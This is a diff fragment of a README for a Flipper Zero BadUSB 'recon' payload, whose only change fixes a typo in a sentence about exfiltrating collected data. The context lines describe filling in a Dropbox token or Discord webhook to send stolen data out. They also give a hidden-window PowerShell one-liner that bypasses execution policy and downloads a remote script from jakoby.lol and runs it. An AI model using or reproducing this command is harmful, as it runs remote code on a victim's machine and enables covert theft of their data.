I-Am-Jakoby/Flipper-Zero-BadUSB/Payloads/Flip-ADV-Recon/README.md

 `$db` is the variable that stores your dropbox token

-Fill in either or both of these to methods to exfil your collected data
+Fill in either or both of these two methods to exfil your collected data

 ```
 powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex